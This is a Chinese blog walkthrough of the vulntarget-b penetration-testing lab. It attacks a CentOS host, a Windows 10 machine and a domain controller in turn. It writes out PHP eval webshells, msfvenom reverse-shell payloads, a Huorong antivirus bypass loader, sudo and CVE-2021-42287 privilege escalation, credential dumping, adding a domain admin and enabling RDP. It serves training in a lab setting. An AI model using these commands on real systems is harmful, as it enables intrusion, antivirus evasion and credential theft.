vulntarget-b 免杀火绒,多层域控内网靶场

目录

靶场环境测试

1.获取外网centos7权限

1.1.信息收集

1.2.getshell

1.3.msf上线

1.4.权限提升

1.4.1.os信息收集

1.4.2.sudo提权

2.获取win10权限

2.1.信息收集

2.2.开启代理

2.3.收集可使用的nday

2.2.getshell

2.3.上线msf

2.3.1.免杀火绒

2.3.2.权限提升

3.获取域控权限

3.1.信息收集

3.2.使用CVE-2021-42287

3.3.远程登陆

3.3.1.添加用户

3.3.2.修改注册表

3.3.3.kali开启远程桌面


靶场环境:

 

f47bc76d4fdfcdff8392e842a7054acc.png

项目地址: https://github.com/crow821/vulntarget

涉及知识点:极致cms相关漏洞、禅道cms相关漏洞、隧道代理、免杀、CVE-2021-1732 、CVE-2021-42287/CVE-2021-42278

kali攻击机 ip:192.168.127.129

centos7 ip:192.168.127.131

靶场环境测试

centos7外网网卡进行修改

cd /etc/sysconfig/network-scripts 
vi ifcfg-ens33

修改成dhcp模式即可,可以参照我下面的图片设置:

 

5cca0688babfe670ccab65e01cafd265.png

1.获取外网centos7权限

1.1.信息收集

nmap -sT -Pn 192.168.127.131

 

d07433e0010d6bb563beb6444a48d043.png

80端口没有找到可利用的东西,888显示403 forbidden,8888是宝塔的登陆面板,这里找到一个81端口,为极致cms搭建的站点。

 

ec44227c0381686f58fcbb5024f407e2.png

点击登陆无反应

 

db598cf26d0530629940b312ad9a6a40.png

端口扫描是否有可利用的信息:

python dirpro.py -u http://192.168.127.131:81/ 

 

26ff6fa45bca7cd0948432b32a782015.png

发现有一个admin.php的页面,访问发现是一个后台管理系统。

 

0e1fe01df8ed9999eece059aa1240f61.png

尝试使用弱口令进行登陆,登陆成功

账号:admin
密码:admin123

 

7523a0e17cf46647b3cc8a17b5da7072.png

进入后台功能点很多,这里查看历史存在的nday,找到了两个,都是利用插件的方式。

1.2.getshell

在插件这儿下载一个插件试试:

 

eeb57ea35edcc37a4b7f7aa7dead6928.png

查看数据包,有三个数据包值得留意:

数据包一:下载准备

 

d0831d5025b023e8773e86e49f31fc99.png

数据包二:下载文件

 

e6a3ef13e07dee3a816dea56c37299ba.png

数据包三:解压缩安装包

 

0bf84c8b58bb9c3daf0fceb7b6776543.png

如上的url可控,我们可以修改url地址为攻击机服务器上的后门。这里我们可以在kali上开启一个web服务。

echo "<?php eval($_POST['nanmu']);?>" > shell.php
zip shell.zip shell
python3 -m http.server

 

1985f6d7b6160d7d2c8bfa31ac5864a3.png

以下修改url要进行很多步,原因是一次最多传1024个字节,我自己一直改了十几次

 

1c7fb3902e12941affc027ebe7055373.png

 

60a57de501d5cb70f16e159be1b54708.png

 

d549dd7931c3d726eef64c217a64db6f.png

写入成功了,我们如何找到写入webshell的路径呢。我们查看安装说明,看到一个路径,/A/exts/

 

207228ef24cc204d874d2527f2e4c575.png

推测路径为:“http://192.168.127.131:81/A/exts/shell.php”,尝试连接,连接成功。

 

f483391dc97be90b0da9cd0695a4e36a.png

但是执行命令发现,无法执行命令,可能存在 disable_function,这里使用蚁剑插件可以绕过(下载插件需要科学上网)。

 

8cb05777440ee34bacbbeb8ed82a9fad.png

 

9d659618c8e1739cf89aa0cbc9ce58ba.png

 

78377bf2dd4e90c338ee12b0ae6a02bb.png

这时候就可以发现能够执行命令了:

 

85ea743d47199effbb73d938c094c328.png

这里还有另一种方式getshell(更简单):这里不过多赘述。

记某CMS漏洞getshell_苹果cmsgetshell-CSDN博客

1.3.msf上线

这里我们将权限转移到msf上,上传一个木马到centos7上即可。

这里设置的是反向连接。

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=10.0.0.3 lport=4444 -f elf >shell.elf

 

0c77f3f969a10d382e9133566cdef43a.png

将生成的shell.elf上传至目标主机,并赋予可执行权限:

chmod +x shell.elf

 

d9c3653c2a1f70821864499a743067f4.png

 

feec2a98a4c5edf19c678ce0aa2ce9b8.png

kali设置监听:

msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.127.129
set lport 4444
exploit

 

58d922e7b1f9d0140513e6849d6d8934.png

1.4.权限提升

得到一个权限较低的权限,先尝试权限提升。

 

3f832e3cdc4727a84e3e54b23306d59a.png

进入shell会话,发现存在python环境,创建一个交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

 

7d38cca9766cd3d2896f9d0ca5d374a1.png

1.4.1.os信息收集

先上传一个探针进行探测

项目地址:https://github.com/mzet-/linux-exploit-suggester

赋予可执行权限:

chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

 

f3f38495087643b2e140d2efde3bcc8f.png

 

c7e90dd47c08c4933f782aa6701561d3.png

可以看到存在脏牛(没有gcc,无法实现)等提权漏洞。

感兴趣的朋友可以看看我写的这篇脏牛提权教程:

Linux脏牛(CVE-2016-5195)提权保姆级教程_脏牛提权-CSDN博客

可以用CVE-2021-3156(sudo提权),还有一个CVE-2021-4034(pkexec),我们这里使用sudo提权。

1.4.2.sudo提权

bg
search CVE-2021-3156
use 0
set target 12 
set session 1 
run

 

9ca8941b7da482a7f81d92ec6c12360f.png

 

440a4efc1700396506dc08ae65ea78aa.png

提权成功,可以看到我们创建了一个名为msf的管理员用户,密码为fjidggrhylxdeva,要是没有生成交互式shell,可以ssh远程登录,然后找到刚才我们生成的shell.elf,运行即可获得管理员权限。

2.获取win10权限

2.1.信息收集

查看ip地址,发现除了192.168.127.131之外还有一个10.0.20.30

 

ea64f800c6bfa7c2e05c2de5bdcca0f0.png

添加路由:

run autoroute -s 10.0.20.0/24
run autoroute -p 

 

3c2f9a2dc8fb63700f80a74dee9cfc21.png

use auxiliary/scanner/portscan/tcp
set rhosts 10.0.20.0/24
set ports 22,23,80,135,139,445,1433,3389,8080
set threads 30
run

 

a6a6a5a5ca93504b49336927d7107043.png

发现10.0.20.66主机,开放了8080端口。

2.2.开启代理

开启代理(上一篇博客讲述了如何配置代理):

use auxiliary/server/socks_proxy
run
jobs

 

cf4e82f2346afb7af23de43d7945be0b.png

这里我们使用本机进行连接,代理端口默认为1080

 

ab48737fd8c6b3edafe35b9b8db3c209.png

访问http:10.0.20.66:8080,发现是禅道的登陆框。

2.3.收集可使用的nday

 

990b6b4edc42891dbced1909a0a40fe8.png

检查版本:http://10.0.20.66:8080/index.php?mode=getconfig发现是12.4.2的版本。

 

21e75468dba5133052f1eaf75d474ccf.png

搜索对应的nday,发现存在getshell的漏洞,进行尝试。

 

b06fafded8a7fd1ff764191f955d3478.png

首先需要登陆进后台

这里尝试使用burpsuit进行爆破,发现存在js加密。

 

30edbf839fd7aca1e8045b1e7558fdcb.png

js逆向花费时间太多,这里推荐一个工具,不需要解密js。使用方式也和burpsuit的方式一样(这里输入次数有限制,寄啦!)

GitHub - gubeihc/blasting

 

5876f8f6329464df285513cfebe78f03.png

不过最后还是获取了账号密码:

admin Admin123

2.2.getshell

首先我们需要在centos7上开启一个临时的web服务并写下一个后门(让win10远程下载)。

bg
sessions
sessions -i 2
shell
python -c "import pty;pty.spawn('/bin/bash')"
echo "<?php @eval(\$_REQUEST['x']);?>" > 2.php

 

18d78a75328a1d5abff0bfb1579461ec.png

开启web服务

python -m SimpleHTTPServer 4455

 

35670bf526c23fd1c39c3621236d6cde.png

之后访问:http://10.0.20.66:8080/index.php/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6NTU2Ni8xLnBocA==

 

e0a99059086a17115325eb4deb428804.png

 

69de8f6bf4e56e75d5d00e8f8e5dd30d.png

路径在/data/client/1/1.php

这里我又尝试了几个免杀webshell,防止被杀....

注意设置为GBK编码,不然页面会出现乱码。

 

ba34a36691c7880e0c494c28d67f84cd.png

2.3.上线msf

2.3.1.免杀火绒

获取到一个较低的权限,将会话转移到msf中,在此之前,先看看有什么杀软。

tasklist

 

94f051502a53251ad8ae4db4abc73aca.png

将所有信息复制,然后粘贴到: 杀软在线查询 ,该项目会自动检测目标主机存在什么杀软。

 

889cf2c4f068cf61ec848f8bb6a2e960.png

可以看到有一个火绒,寻找可以绕过火绒的方法。

这里需要下载一个加载器:

https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/gsl-sc-loader.zip

生成shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.0.20.30 lport=3333 -f hex -o shell.hex

 

f29b296e3420382b03b414a8c051b766.png

将该文件以及加载器都上传到win10中。

 

c31509b283f8240391aec32d8f69f63f.png

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.0.20.30
set lport 3333
run
gsl64.exe -f shell.hex -hex

 

894be847ef1ebec06a687c0d6ccc5dd2.png

 

58e0df7744e7aef57880034579256098.png

2.3.2.权限提升

发现是一个较低权限,但是输入getsystem也能获得管理员权限,这里还可以使用Microsoft Windows10 本地提权漏洞(CVE-2021-1732)

 

481575f1ee2068dc5361f22b7f12a99e.png

休眠和关闭防火墙:

shell
chcp 65001
powercfg -h off
netsh firewall set opmode mode=disable

 

3a8ddc26287fd91bf55bd5d92feee60e.png

3.获取域控权限

3.1.信息收集

ipconfig /all

 

0b68d7af05be4d998f952fe1c992abb5.png

查找域控ip:

nslookup WIN-UH20PRD3EAO.vulntarget.com

 

cfe780242aa080c92d93cec516e678fe.png

域控ip为10.0.10.100

load kiwi
creds_all

 

be42488276248ac58ddbc5788aa100f0.png

hashdump

 

63dfcdd47d9924ca232f5d143cd722e6.png

hash解密得到密码为admin#123

添加路由:

run autoroute -s 10.0.10.1/24
run autoroute -p

 

d0750ac76e0e2048dda94b5b39b9d1fd.png

3.2.使用CVE-2021-42287

Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)是由于Active Directory 域服务没有进行适当的安全限制,导致可绕过安全限制进行权限提升。攻击者可利用该漏洞造成将域内的普通用户权限提升到域管理员权限等危害。

git clone https://github.com/WazeHell/sam-the-admin.git

下载sam脚本后需要修改一下源码:

sudo vi sam_the_admin.py

 

a80054773e84ef84262b66de71cb1bda.png

需要添加“-codec gbk”,否者会出现乱码导致命令结果无法查看。

proxychains4 python3 sam_the_admin.py "vulntarget.com/win101:admin#123" -dc-ip 10.0.10.100 -shell

 

a9fc25dcda78843f2e660d53d23f9725.png

可以看到我们已经控制了域控,且权限为system。

3.3.远程登陆

3.3.1.添加用户

net user nanmu1 WSAD@520 /add /domain

 

3174c4bd31735ec61dc3ffcd45f535e0.png

net group"Domain Admins" nanmu1 /add /domain

 

4286c180223c4c167b2bacb321ca479c.png

3.3.2.修改注册表

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f 
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

 

0cea6fe60ab7cd94b8cece5d91023239.png

3.3.3.kali开启远程桌面

proxychains remmina

 

6d9b211225fcdafd58cea37c0a4af7e0.png

成功获取域控

 

028e16d8f48a4d063bb6c3d288474e65.png

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

  • 31
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

B10SS0MS

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值